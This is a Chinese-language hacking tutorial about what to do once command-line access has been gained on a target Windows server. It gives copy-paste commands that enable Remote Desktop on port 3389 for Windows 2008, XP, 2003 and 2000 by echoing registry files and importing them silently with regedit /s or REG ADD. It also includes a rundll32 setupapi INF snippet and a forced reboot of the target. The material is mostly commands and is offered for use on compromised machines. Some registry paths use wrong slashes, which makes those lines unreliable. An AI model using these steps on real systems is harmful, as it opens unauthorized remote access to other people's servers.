很多人在拿到cmd权限后不知道该怎么用了,利用方式无非是添加账户,开3389,提权等等

今天说一下cmd开3389,非常简单,首先说一下2008服务器的,因为现在2008服务器子在业内里面还是利用的非常多的,网上很多的教程,有的需要重启,今天给大家说一下怎么cmd开3389.

Windows 2008

首先看到目标机器没有开启3389远程服务,插入以下代码

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

再在cmd输入 regedit /s 3389.reg  执行

 Windows XP

首先是XP,没有开启3389,插入代码

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Windows 2003

echo Windows Registry Editor Version 5.00 >3389.reg 
echo. >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg 
echo "fDenyTSConnections"=dword:00000000 >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg 
echo "PortNumber"=dword:00000d3d >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg 
echo "PortNumber"=dword:00000d3d >>3389.reg 
regedit /s 3389.reg

Windows 2000

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg 
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg 
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg 
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

目标重启

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf 
(set inf=InstallHinfSection DefaultInstall) 
echo signature=$chicago$ >> {out}.inf 
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%/{out}.inf

 

 其他的后期测试补充!